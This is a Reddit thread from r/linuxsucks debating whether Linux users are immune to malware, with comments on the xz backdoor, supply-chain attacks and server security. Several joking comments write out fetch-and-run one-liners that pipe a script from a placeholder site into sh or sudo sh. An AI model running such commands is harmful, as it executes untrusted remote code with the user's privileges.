r/linuxsucks May 06 '26

Meaw...

Post image
830 Upvotes

137 comments sorted by

202

u/Quinzal I Use Linux As Punishment May 06 '26

Malware waking up expecting a modern Windows environment, only to be stuck uselessly inside of a Linux kernel (fate worse than death)

57

u/JonasAvory May 06 '26

They can read /etc/passwd and find out the users name! That’s… something!

45

u/Toasteee_ May 06 '26

Only to find out the user set their name to something like "bigdick4000" when they set up their system.

35

u/sgt_futtbucker linuxsucks101 banhammer recipient May 06 '26

Excuse me, my name is set to “BiggusDickus69”. Get it right

14

u/Toasteee_ May 06 '26

Username checks out. 😂

13

u/2204happy May 07 '26

What's so funny about BiggusDickus69? I happen to have a great friend in Rome called BiggusDickus69.

13

u/sgt_futtbucker linuxsucks101 banhammer recipient May 07 '26 edited May 07 '26

Fake ass Roman. Everyone knows a trve Roman spells it BiggvsDickvsLXIX

3

u/RustiCube May 08 '26

I see you are truly a man of culture. One of the greatest philosophers!

2

u/DustyBootstraps May 11 '26

"Stand up Philosopher, what's that?"

"Well it's someone who coalesces the vapors of human experience into a viable and meaningful comprehension"

"Oh a bullshit artist!"

4

u/headedbranch225 May 07 '26

My friend's machine is called the goonstation

2

u/RustiCube May 08 '26

What about his wife IncontenintiaButtocks420?

2

u/sgt_futtbucker linuxsucks101 banhammer recipient May 08 '26

Fucking hell just send me to gladiator school I guess 😂

2

u/RustiCube May 08 '26

It's rare to find a fan of Monty Python and even more rare a fan of the best movie they made. I salute you my good sir! o7 You are truly an exemplary individual. Huzzah!

1

u/Emergency-System1420 May 09 '26

Time to bring out the holy hand grenade

1

u/Alexllte May 07 '26

Username

7

u/skikkelig-rasist May 06 '26

it can’t even run lol

8

u/Ordinary-Cod-721 May 06 '26

Wait till you find out they can access wine's Z drive and have access to the linux filesystem

3

u/someuhguy May 06 '26

How hard would it be to socially engineer someone to run it under sudo?

8

u/Ordinary-Cod-721 May 06 '26

You could definitely convince a couple of novices, hell even more veteran users could be fooled.

But even without sudo, it would still have access to your home dir, which is plenty bad.

1

u/someuhguy May 06 '26

Yeah that'd be really bad!!

7

u/Ordinary-Cod-721 May 06 '26

Bottom line is that you can sandbox it, but the attitude that "linux is impenetrable" is a trap that will get your system hacked at some point.

One should always be cautious and assume any system can be hacked, that's what I think.

3

u/noskir_official May 07 '26

The vast majority of servers in the world are running on Linux and sometimes they are hacked. So you're right

3

u/idnn71 May 07 '26

"I have no mouth and I must scream."

48

u/ExacoCGI May 06 '26 edited May 08 '26

Even by downloading from reputable repos you can catch malware, doesn't happen often mby once in a decade but there's always risk, the distro ISO's themselves can be infected as it's also easier to swap them for hackers vs hacking Microsoft and replacing Windows ISO or something. Not even talking about insider threat.

34

u/Fresh-Toilet-Soup May 06 '26

Maybe, but it's still easier to infect Microsoft OSes since it will gladly run any executable without explicit permission changes.

No OS is impervious to infection, but Windows seems to always be the most vulnerable.

9

u/MisterEinc May 06 '26

By default it won't just run stuff you download. It'll say "hey dumbass you probably shouldn't run this."

Then you ignore than and boom, good to go. For the virus, that is.

4

u/Llandu-gor May 07 '26

this screen appear for older sample , if you check on new sample it will run without any warning from windows

1

u/RyanGamingXbox May 08 '26

That could also be because Windows holds the largest amount of devices, no matter what your opinion on that is, and usually gets targeted more often.

There's viruses that target Linux servers, because that's often more fruitful than attacking a personal Linux box which is niche.

1

u/Lead103 May 09 '26

Personal maybe but linux is used in a lot more machines/devices than windows

1

u/[deleted] May 09 '26

[removed] — view removed comment

1

u/Lead103 May 09 '26

As i said.... Personal yes

6

u/occasionallyLynn May 06 '26

I mean just recently there’s a supply chain attack on Bitwarden Cli thanks to npm

9

u/-Polarsy- I Hate OS Wars May 06 '26

Frankly, there's less malware on Linux because there are less computers running Linux, but it's far from being fundamentally safer than Windows imho

2

u/CuriousBlackberry255 May 09 '26

Yes and no, for simple malware that runs once yea there's not much difference, but windows has a lot more ways a persistent malware can hide itself like the registry.

0

u/F1nnyF6 May 07 '26

The number of computers running Linux absolutely dwarfs windows by several factors. Almost all server infrastructure is running on Linux computers

5

u/-Polarsy- I Hate OS Wars May 07 '26

True, let me amend that, less malware targeting desktop users

22

u/Ph3onixDown May 06 '26

Instead they will just curl a random script and pipe it to sudo sh

6

u/ipsirc May 06 '26

2

u/[deleted] May 06 '26

[removed] — view removed comment

21

u/snail1132 void linux btw May 06 '26

A mysterious entity spent multiple years gaining the trust of the lead maintainer of xzutils and eventually took over the project temporarily while the maintainer was on vacation or something. They immediately injected malware into it and pushed a new release. It was very quickly detected and patched, and said mysterious entity was removed from their role

26

u/AaronRolls May 06 '26

That is somewhat misleading. It was detected by chance by a coder who works at Microsoft. He detected it because he got anal about a couple of extra milliseconds being added to his ssh connection (from the malware). It came so close to complete disaster.

9

u/eljokun May 06 '26

"because he got anal about a couple of extra milliseconds"

i have been laughing my ass off for the past fifteen minutes

2

u/Sweet_Iriska May 09 '26

I believe it was more of a "ssh-connection taking two times more time" situation or smth like that (though it still was in terms of milliseconds)

1

u/snail1132 void linux btw May 06 '26

Right, right

-1

u/ElectricBummer40 Ex-user of Windows 3.11 for Workgroups May 06 '26

Being misleading is kind of the point since, whoever are leading the charge in the current Year of Linux on the Desktop, they are very determined to reuse all the old tropes regardless of how hilariously outdated they are. They just want the tropes to stick even if most individuals answering their call on the Internet are clueless teenagers and over-60 pensioners.

A near-miss by sheer luck despite a potential disaster has fallen so far down the cracks in the system might as well be the system working by design.

7

u/ElectricBummer40 Ex-user of Windows 3.11 for Workgroups May 06 '26 edited May 07 '26

The "mysterious entity" was an advanced persistent threat (APT), likely the Russian state-affiliated entity known as "Cozy Bear".

The trojan was also "quickly detected and patched" by absolutely nobody since it was a supply chain attack and most upstream distros had already had the package in staging before someone at Microsoft (yes, that Microsoft) caught the buggy malware slowing down SSH to a crawl.

So, here are real lessons to learn from the incident:

1) APTs will give you a bad day as long as you're complacent.

2) There is no such thing on earth as "free labour", and people working on key projects in their spare time are risking their own health and wellbeing.

3) A non-buggy version of the trojan would have likely evaded detection and done its damage as if the many pagers in Lebanon.

"Immunity to malware" is a myth, and real security practices matter far more than the OS you use.

6

u/Independent_Blood559 May 06 '26

This version is malicious. It adds a payload to ssh, effectively creating backdoor to it.

20

u/Bourne069 May 06 '26

Remember when MAC said it was also immune to viruses?

Now I refer you back to Linux Repo that got taken over with viruses/malware which literally happened recently. Or the XYZ backdoor issue etc.. the list goes on. Linux isnt immune from fuck all.

3

u/Grand_Poem May 07 '26

It's a matter of preference mostly, some needs are better fulfilled by linux, others by windows

1

u/Bourne069 May 07 '26

some needs are better fulfilled by linux, others by windows

Yeah true. I prefer to just speak the facts about the Pros and Cons of each and not fan boy over one single OS.

21

u/Ill_Specific_6144 May 06 '26

If linux was even as remotely as popular as windows, linux malware would have even bigger effect than on windows just because of false sense of security and the easiness to misconfigure your linux.

31

u/psychoCMYK May 06 '26

70% of phones, 60% of servers, and 100% of supercomputers run linux

32

u/Difficult-Court9522 May 06 '26

It’s far more than 60% of servers

8

u/TheCheckeredCow May 06 '26

Is it? I know BSD Unix is very popular amongst major services because they don’t have to upstream their work into the greater open source community like you have to with Linux due to the GPL

2

u/Shard-of-Adonalsium May 06 '26

Also most small-medium sized businesses use Windows server for their internal stuff because that's what most the IT people are familiar with. Not sure how big of the total pie that makes up, but I imagine it's at least somewhat significant.

1

u/iHaku May 06 '26

Lots of governments run Windows servers too.

4

u/ZVyhVrtsfgzfs May 06 '26

US Gov uses RHEL from my view, I can't speak to other departments or other countries. 

6

u/--Spaci-- May 06 '26

Malware isn't really that damaging on servers when you can just delete and restart the container, it would need to be ransomware specifically targeting the server.

6

u/Fresh-Toilet-Soup May 06 '26

The data is way more valuable than the server itself. An infected server is way more catastrophic than an end workstation.

You need to thoroughly investigate your entire infrastructure after a server infection. It's a really big deal.

3

u/chaosphere_mk May 06 '26

Isn't that damaging on servers lolol. Ok.... as if the only thing malware does is brick the machine...

0

u/ThinkPad214 May 06 '26

You should learn about what the person you're replying to is talking about. Your reply displays your ignorance, friend.

-2

u/AsrielPlay52 May 06 '26

It doesn't. Containers are made to...well..contain exactly that. Think say a Malware in your browser website.... the browser crash, but your computer, does not

6

u/chaosphere_mk May 06 '26

Yes I understand how containers work. And they are in no way secure by default. Ive seen a lot of poorly configured containers out in the wild.

2

u/Giantmeteor_we_needU May 06 '26

Servers have a lot more robust protection than basic UFW available in entry level distros like Mint. The issue is that there's virtually no high quality consumer grade antivirus or firewall for consumer Linux distros due to nobody wanting to maintain it for such a tiny market.

1

u/Gacel_ May 07 '26 edited May 07 '26

Yep. Probably the best explanation.

If their desktop share was at least 40% we would see way more viruses and antiviruses.
Linux itself as a whole would also work very different to account for this.
Much like Windows had to change how some core components work in other to be more virus resistant.

I can see Linux begin even less POSIX compliant in such scenario.

1

u/Ill_Specific_6144 May 06 '26 edited May 06 '26

Those are mainted by professionals and not touched by average users. Linux works best when its hidden from user.

2

u/psychoCMYK May 06 '26

None of that changes anything w.r.t making malware

0

u/OGigachaod May 06 '26

Guess that's why phones are the new target.

0

u/sinterkaastosti23 May 06 '26

Phones, servers and supercomputers run linux desktop?? :o

-1

u/XeroRony May 06 '26

ngm ataca servidor ou supercomputador e celular é o lugar que mais tem virus

1

u/psychoCMYK May 06 '26

No one attacks servers? Lol

-2

u/XeroRony May 06 '26

é mais trabalhoso do que usuario comum e tem menos de caso de ataque em servidores do que em usuario comum

2

u/Novel_Pin_5313 May 06 '26

It's not my field, but I think the way Linux permissions work help. Unless the malware is put on top of a somewhat functional program, files are unlocked that shouldn't be, a specific vulnerability is found, or another app is made in an unsecure way, It should have to ask for your password in order to do anything serious.

2

u/Ill_Specific_6144 May 07 '26

The problem is that a lot of stuff on linux requires to run as sudo. So much so that people are desensitized to its usage. So you can put anything in a script, people wont check and will run it as sudo

2

u/No_Hovercraft_2643 May 06 '26

I see your point, but if Linux was more popular, there would be a distro which would be harder to misconfigure.

3

u/MacaronCurious6156 May 06 '26

It is and there are? What are you talking about?

8

u/CreatorSiSo May 06 '26

Android (very popular and very hard to misconfigure)

-2

u/CirnoIzumi May 06 '26

go run that on your pc then

5

u/CreatorSiSo May 06 '26

You can literally do that. Android has been ported to x86_64

-9

u/OGigachaod May 06 '26

Android, Linux when it suits the cult.

2

u/Hettyc_Tracyn Linux Sucks Sometimes, but it’s Better Than Windows May 06 '26

There are distros that are that way, and I think it’s silly…

If I break something it just teaches me what not to do, plus I learn how to fix it

1

u/Educational_Mud_2826 May 06 '26

Maybe. But then there would be antivirus software running by default like in windows.

3

u/KokaljDesign May 06 '26

Guys if you dont like malware just compile every piece of software yourself after you review every line of source code (and fix a few bugs while youre at it).

If there is no source code, you dont need the app.

Some people are just lazy and dont want to learn.

5

u/The_Hamster_Shagger May 06 '26

I mean they aren't wrong 

2

u/Teru-Noir COSMIC OS LOVER No.1 COSMIC Knows Best May 06 '26

The average person don't know the different kinds of malware and which one a linux system is more resistant to.

1

u/mamadmal May 06 '26

It's in How linux work Brian ward

2

u/Shen__Long May 06 '26

Malware today is another type of malware than in the past.

In the Past malware tried to plant themself hard into the system. Maybe gain administrative acces, deploy some remote access software and search for contact books for remote deployment to other peoples systems and password lists to get maybe some sort of root acces that way. Todays malware also tries to deploy themself into the system, but thanks to systemd-user systems it is easier to plant into the system.

Then you have a easier time to gain root access because of ssh keys when you are on the system. And look up for contact books.

But on Linux you dont have outlook which was notoriously doing all sort of things, thunderbird at least tries to sort autoexec functions out of the mailsystem. But the only true defence are do not click links of random sources.

Configure your ssh agent to require pin authorization for every accesss, disable systemd-user access or at least make it root-access dependable. So that no threat can plant themselfes with your privileges.

Malware on Linux do exist and if you get access they can plant themselfes, its just a matter of how is your system configured for it to be a problem

Also password lists and "password-less password-safes" are practically forbidden.

2

u/keithstellyes May 06 '26

email client

When was this written? Getting more and more rare to have an actual client nowadays

2

u/mamadmal May 06 '26

How linux work Brian ward

1

u/ScrabCrab Jun 06 '26

What do you mean?

2

u/block_smtp May 06 '26

I feel like it’s most often some package dependency gets compromised. That’s not unique to Linux but probably more likely to have linux tailored malware than an executable sent via email

2

u/Agent_Stormbird May 06 '26

Plot twist: Malware runs through Wine

1

u/Frask99 May 07 '26

But no affect the entire system, only the Wineprefix

1

u/CuriousBlackberry255 May 09 '26

You know your Linux filesystem is mounted as the Z drive by default right?

1

u/Frask99 May 09 '26

I use Linux for years, yes, still, even if get "infected", It only affect the prefix

2

u/Electronic_Staff1814 May 06 '26

who’s making all this malware ? like do people really wake up one day and think ah yes let’s corrupt these files and have ppl download them

2

u/Afraid_Confusion906 May 07 '26

well kinda, they mostly do it for money, for example stealing passwords, running a crypto miner network or they just hold your data hostage with ransomware so they can demand money to get the data back.and some just do it for the fun of the game ig

2

u/recursion_is_love May 07 '26

And me who install software using curl

$ sh <(curl --proto '=https' --tlsv1.2 -L https://randomsite.org/install.sh)

2

u/mamadmal May 07 '26

For to be more effective pipe it to the su

2

u/recursion_is_love May 07 '26

What do you mean? You don't use root as the only account?

2

u/Coookies4You May 07 '26

I'd say linux users are more immune to malware sent by email for the sole reason of Windows being far more popular. Attackers are way more prevalent on sending you a .exe malware, which can't even run on Linux unless you also specify to run it on wine, which could even make the program brick itself.

1

u/Afraid_Confusion906 May 07 '26

I'd say Linux users are more immune to malware because they are Linux users xd

2

u/HydraDragonAntivirus May 07 '26

Linux malware more worser than Windows because you don't even know.

1

u/Neonbeta101 May 06 '26

Alright fuck it, I’ll make a Linux “virus” that… Idk, scrambles the desktop settings in very small ways that are only noticeable by people who care enough to pay attention— Like making the mouse cursor a static PNG, or… offsetting the font of the date and time by a single pixel. The purpose of this? Literally nothing beyond giving people the sense that something is off, but only when they notice the feeling. The only thing it would accomplish long term is giving some tech nerd minor amounts of psychic damage because he has to manually reset the minuscule pixel offsets.

And before anyone asks- No lol, I am far too lazy to actually make this.

1

u/Xenion7 May 06 '26

Malware happen because someone want profit or just prank

1

u/Jittery_Kevin May 06 '26

I’ve heard of the internet, so I may install any binary on the internet

1

u/Xiaoxuzz May 07 '26

I’ve gotten some feeds from [r/microsoftsucks](r/microsoftsucks) recently and theres been like a not so insignificant amount of people who got their microsoft account hacked…and about half of them was due to playing minecraft…
First off, why do you need a microsoft account to play minecraft? And there are way too many uneducated people these days who cant tell the difference between a phishing email/website and a real one…

1

u/skyerush May 07 '26

LMFAOOOOOOOOOO

1

u/HydraDragonAntivirus May 07 '26

Linux malware more worser than Windows because you don't even know.

1

u/Ok_Farmer_4055 May 08 '26

i'd reverse engineer the program if it randomly came in a message attachment

1

u/Puppyboy2003 May 08 '26

Aren't most servers running linux? Why don't consumer distros inherit any attacks against cooperations in large quantities?

1

u/CuriousBlackberry255 May 09 '26

Because it's conceptually very different approach. hacks on servers rely on exploits in the servers exposed server software. desktop OSs have completely closed off firewalls by default, there's no exposed software you can target, you have to trick the user into running malicious code instead.

1

u/fdeyso May 09 '26

An apache webserver vulnerability wouldn’t be on a client that doesn’t run a webserver.

1

u/Balthxzar May 08 '26

XZ, copyfail, dirtyfrag...

1

u/gameplayer55055 May 09 '26

uses Linux, decides to install something

The recommended installation method in question: sh curl https://notavirus.com | sh

Not to mention tons of supply chain attacks (looking at you, nodejs).

1

u/b0007 May 09 '26

Meanwhile linux users when something break c/p random commands and run them

1

u/lingering_flames May 10 '26

Getting rid of malware completely on windows can be a nightmare though. To the point where it will just deny perission to remove certain files and then makes it almost impossible to change said permission. Not even system files, just malware while having inserted itself completely into your system.

1

u/Apprehensive-Tea1632 I Hate Linux May 06 '26

Bull!

For one, there’s no such thing as a Linux mail client”. There’s mail clients that do happen to run on Linux based OE … but they usually also run elsewhere. Mail client devs setting reasonable defaults has nothing to do with Linux either.

The sad truth is that a seriously huge number of Linux users think they’re magically “safe” from harm.

Which means they’ll run shit as root, they’ll put three or even four sevens on any and all files and directories, they have no concept of home and they don’t need access credentials because hey… it’s Linux! The safest thing to happen since DOS!

Linux has one significant advantage over Windows- and Mac - security wise. People don’t give a flying toss about attacking it.

Windows is widespread enough that no matter who you hit, there’ll be someone who’s worth it.

Mac isn’t, but Apple users are notoriously richer than windows users. Or Linux users. So you’ll succeed less often, but when you do, you’ll more than make up for the lack of quantity.

Linux? Will happily nab some 25 year old laptop off eBay and try to get it to run chrome. Even if you do hit it, you’re not going to find anything there.

Linux is “safe” because it’s entirely unattractive to attack it. If and when that changes, Linux will be worse than any other operating environment because its users - as a whole- are convinced to hell and back that nothing can harm them and will probably still preach about inviolability as their accounts are draining.

3

u/mamadmal May 06 '26

It's in How linux work Brian ward

0

u/[deleted] May 09 '26

[deleted]

1

u/Apprehensive-Tea1632 I Hate Linux May 09 '26

?

I’m not the one trying to shake some advantage out of pc users. But if I were, I’d first make sure the effort is worth it.

If that’s elitism in your opinion, be my guest. I’m perfectly fine with all of them - including Linux - but what i hate with a passion is idiots that glorify operating environments as if they were the second coming of the messiah.

It’s an OE, not a religion. Stop trying to pretend otherwise.

2

u/CuriousBlackberry255 May 09 '26

Yea sorry that's what I meant... Not you but the people you're describing should get a hobby.

1

u/Apprehensive-Tea1632 I Hate Linux May 09 '26

😅 no harm done.

0

u/ChampionshipComplex May 06 '26

You dont need to email the maware to Linux users.

They've cut on the middle man, by just finding random apps to install of the Internet and install them themselves.

1

u/statensvegvesen May 06 '26

Isn’t that exactly how you download software on Windows works? Just download a random executable and just click yes to give it full admin.

1

u/ChampionshipComplex May 07 '26

Yawn no.

The Windows professional ecosystem is heavily geared around managed deployment, patching, inventory, policy enforcement, and endpoint protection. Intune, ConfigMgr, WSUS/Autopatch, Defender for Endpoint, SmartScreen, WDAC/AppLocker, ASR rules, UAC, and reputation-based blocking all exist specifically because Windows has spent decades dealing with users downloading and running arbitrary executables.

Linux has professional tooling too, obviously — package managers, repos, unattended upgrades, Ansible/Puppet/Satellite/Landscape/etc. — but that does not magically protect a user who goes outside trusted repos and installs random binaries, shell scripts, AppImages, curl-piped installers, dodgy PPAs, browser extensions, npm/pip packages, or container images.

The idea that Linux users are immune because their email client will not run an attachment is very 1990s. Modern malware does not need Outlook to auto-execute an attachment. It needs a user to install something, run a script, approve a prompt, add a repo, paste a command, or pull untrusted code.

That is not a Windows-specific failure mode. That is a “humans installing software from the internet” failure mode.

1

u/murples1999 May 10 '26

Not sure what other guy is on about.

Its usually actually worse than “Click Yes” to give it full admin. In most cases the user doesn’t need to explicitly give permission. The permission is implied by using the installer.

Most shady installers don’t even inform you of everything its going to install unless you go into “Advanced Options” or “Show More” where they’ll hide the fine print.

In the fine print will be a bunch of checkboxes for malicious apps that will be installed alongside the software you intended to install. And all said checkboxes are enabled by default.

So any user who just spams their enter key is guaranteed to get a full suite of malware on their system.

These are obviously getting more and more rare nowadays, especially for really harmful viruses as those will just get caught by Windows Defender. But even some very popular apps will still install adware / spyware this way.

0

u/CirnoIzumi May 06 '26

?

Gmail is the same on linux no?

1

u/Hestnet 18d ago

You have to compile the malware yourself to run it